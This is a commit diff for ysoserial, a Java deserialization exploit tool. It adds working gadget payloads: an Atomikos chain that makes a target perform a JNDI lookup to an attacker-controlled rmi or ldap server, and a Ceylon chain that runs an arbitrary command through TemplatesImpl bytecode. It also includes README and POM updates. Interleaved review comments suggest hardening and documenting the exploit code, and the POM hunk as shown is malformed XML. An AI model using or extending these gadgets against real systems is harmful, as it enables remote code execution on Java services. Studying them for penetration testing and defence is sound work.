New gadgets (#180)
* CommonsCollections8 payload (#116)

* New gadgets (Struts2JasperReports - Atomikos - SpringJta) (#123)

* added Atomikos gadget payload

* added Atomikos gadget payload

* naming

* added spring-jta gadget

* added strutsJasperReports gadget + tests

* updated deps list on springJta

* fixed authors

* renaming

* Add new payload in Commons Collections 3.2.1 (#125)

* Add Jython2 gadget (#135)

This version of Jython2 executes a command through os.system(). Based on Jython1 from @pwntester & @cschneider4711

Co-authored-by: Chris Frohoff <[email protected]>

* Add scala and clojure payloads from a couple of years ago (#137)

* Add some payloads for Scala

* Add new clojure payload affecting versions since 1.8.0

* Fix infinite loop behavior of clojure2 payload.

* add CommonsBeanutils2 (#163)

* ceylon gadget (#173)

Co-authored-by: navalorenzo <[email protected]>
Co-authored-by: Stefano Ciccone <[email protected]>
Co-authored-by: 梅子酒 <[email protected]>
Co-authored-by: Yorick Koster <[email protected]>
Co-authored-by: Ian Haken <[email protected]>
Co-authored-by: k4n5ha0 <[email protected]>
Co-authored-by: supersache <[email protected]>
8 people authored Apr 27, 2022
1 parent bac4220 commit be6cbf7
Showing 15 changed files with 847 additions and 42 deletions.
76 changes: 39 additions & 37 deletions README.md
@@ -43,44 +43,46 @@ are not responsible or liable for misuse of the software. Use responsibly.
```shell
$ java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
Payload Authors Dependencies
------- ------- ------------
Atomikos @pwntester, @sciccone transactions-osgi:4.0.6, jta:1.1
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
SpringJta @zerothoughts, @sciccone spring-tx:5.1.7.RELEASE, spring-context:5.1.7.RELEASE, jta:1.1
Struts2JasperReports @sciccone struts2-core:2.5.20, struts2-jasperreports-plugin:2.5.20
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4

```

## Examples
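Review bot: the regenerated payload table (the block starting at `Payload Authors Dependencies`) drops the AspectJWeaver and Click1 rows that the removed table had, even though pom.xml still carries `aspectjweaver` and `click-nodeps` in the context lines of its later hunks, and it does not list Ceylon, which this commit adds in src/main/java/ysoserial/payloads/Ceylon.java. Regenerate the table from the real `java -jar ysoserial-[version]-all.jar` output of a full build of this branch instead of hand-merging rows, so README.md matches the payloads that actually ship. The README dependency strings also disagree with the POM in at least one place: JBossInterceptors1 and JavassistWeld1 list `javassist:3.12.1.GA` while pom.xml pins `3.12.0.GA`; worth confirming which one is authoritative.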
41 changes: 38 additions & 3 deletions pom.xml
@@ -277,9 +277,9 @@
<version>1.7R2</version>
</dependency>
<dependency>
<groupId>javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.12.0.GA</version>
<groupId>javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.12.0.GA</version>
</dependency>
<dependency>
<groupId>org.jboss.weld</groupId>
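Review bot: the javassist `<dependency>` block (`<groupId>javassist</groupId>` through `<version>3.12.0.GA</version>`) is removed and re-added with identical content, so this hunk is an indentation-only change. Drop it from this commit, or put it in a separate formatting commit, so `git blame` and reviewers do not attribute a dependency change to the gadget work.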
@@ -326,6 +326,36 @@
<artifactId>vaadin-server</artifactId>
<version>7.7.14</version>
</dependency>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-library</artifactId>
<version>2.12.6</version>
<dependency>
<groupId>com.atomikos</groupId>
<artifactId>transactions-osgi</artifactId>
<version>4.0.6</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-tx</artifactId>
<version>5.1.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context</artifactId>
<version>5.1.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.apache.struts</groupId>
<artifactId>struts2-core</artifactId>
<version>2.5.20</version>
</dependency>
<dependency>
<groupId>org.apache.struts</groupId>
<artifactId>struts2-jasperreports-plugin</artifactId>
<version>2.5.20</version>
</dependency>

<dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjweaver</artifactId>
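Review bot: the new `org.scala-lang:scala-library:2.12.6` element (`<groupId>org.scala-lang</groupId>` through `<version>2.12.6</version>`) has no closing `</dependency>` before the `com.atomikos` `<dependency>` opens. As shown, the POM is not well-formed XML and Maven will refuse to parse it, so either the tag was lost in the diff or the build is broken; add `</dependency>` after `<version>2.12.6</version>` and run `mvn validate`. Separately, the Atomikos and SpringJta payloads declare `javax.transaction:jta:1.1` in their dependency lists, but no `jta` artifact is added in this hunk; confirm it is already declared elsewhere in the POM or arrives transitively, otherwise those payloads will not compile.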
@@ -336,6 +366,11 @@
<artifactId>click-nodeps</artifactId>
<version>2.3.0</version>
</dependency>
<dependency>
<groupId>org.ceylon-lang</groupId>
<artifactId>ceylon.language</artifactId>
<version>1.3.3</version>
</dependency>
</dependencies>

<profiles>
77 changes: 77 additions & 0 deletions src/main/java/ysoserial/payloads/Atomikos.java
@@ -0,0 +1,77 @@
package ysoserial.payloads;

import javax.management.BadAttributeValueExpException;

import com.atomikos.icatch.jta.RemoteClientUserTransaction;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/**
*
* Gadget chain:
*
* javax/management/BadAttributeValueExpException.readObject()
* com/atomikos/icatch/jta/RemoteClientUserTransaction.toString()
* com/atomikos/icatch/jta/RemoteClientUserTransaction.checkSetup()
* javax/naming/InitialContext.lookup()
*
*
* Arguments:
* - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
*
*
* @author pwntester
* payload added by sciccone
*
* This gadget chain was also discovered by pwntester:
* https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
*
*/
@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest")
@Dependencies( { "com.atomikos:transactions-osgi:4.0.6", "javax.transaction:jta:1.1" } )
@Authors({ Authors.PWNTESTER, Authors.SCICCONE })
public class Atomikos implements ObjectPayload<Object> {

@Override
public Object getObject(String command) throws Exception {

// validate command
int sep = command.lastIndexOf('/');
if ( sep < 0 || (!command.startsWith("ldap") && !command.startsWith("rmi")))
throw new IllegalArgumentException("Command format is: " + command
+ "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");

String url = command.substring(0, sep);
String className = command.substring(sep + 1);

// create factory based on url
String initialContextFactory;
if (url.startsWith("ldap"))
initialContextFactory = "com.sun.jndi.ldap.LdapCtxFactory";
else
initialContextFactory = "com.sun.jndi.rmi.registry.RegistryContextFactory";

// create object
RemoteClientUserTransaction rcut = new RemoteClientUserTransaction();

// set values using reflection
Reflections.setFieldValue(rcut, "initialContextFactory", initialContextFactory);
Reflections.setFieldValue(rcut, "providerUrl", url);
Reflections.setFieldValue(rcut, "userTransactionServerLookupName", className);

// create exception
BadAttributeValueExpException exception = new BadAttributeValueExpException(null);
Reflections.setFieldValue(exception, "val", rcut);

return exception;
}


public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(Atomikos.class, args);
}
}
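Review bot: the IllegalArgumentException message in getObject concatenates the user's command straight onto the format string (`"Command format is: " + command + "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>"`), so for an input such as `http://x/y` it prints `Command format is: http://x/y(rmi,ldap)://...`, which reads as if that were the expected format. Separate the two, e.g. `"Invalid command '" + command + "'. Format is: (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>"`. The validation is also looser than the message implies: `startsWith("ldap")` and `startsWith("rmi")` accept `ldapfoo`, and `lastIndexOf('/')` accepts `ldap://host:1389` (no class name) and splits it into url `ldap:/` and className `host:1389`; require the `://` prefix and a non-empty path after the last slash. Finally, the Javadoc chain should state the precondition that `BadAttributeValueExpException.readObject()` only calls `val.toString()` when no SecurityManager is installed (JDK 8u76 and later), since on a target running with a SecurityManager this chain silently does nothing.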
23 changes: 23 additions & 0 deletions src/main/java/ysoserial/payloads/Ceylon.java
@@ -0,0 +1,23 @@
package ysoserial.payloads;

import com.redhat.ceylon.compiler.java.language.SerializationProxy;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;

@Authors({ Authors.KULLRICH })
@Dependencies({ "org.ceylon-lang:ceylon.language:1.3.3" })
public class Ceylon implements ObjectPayload<Object>
{

//
// Probably the simplest deser gadget ever ;-)
//
@Override
public Object getObject(String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);

return new SerializationProxy (templates, templates.getClass(), "getOutputProperties");
}
}
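Review bot: Ceylon.java has neither a `@PayloadTest` annotation nor a `public static void main` that calls `PayloadRunner.run(Ceylon.class, args)` as Atomikos.java in this commit does, so it is not exercised by the test suite and cannot be run stand-alone; add both. The `Probably the simplest deser gadget ever` comment should also become a Javadoc that names the chain, as Atomikos.java does: the constructor arguments (instance, class, method name) indicate SerializationProxy resolves and invokes the named method on the instance during deserialization, so document the actual entry point (readResolve or readObject) and that the method looked up on `templates.getClass()` is TemplatesImpl.getOutputProperties(), the usual bytecode-loading sink behind `Gadgets.createTemplatesImpl(command)`.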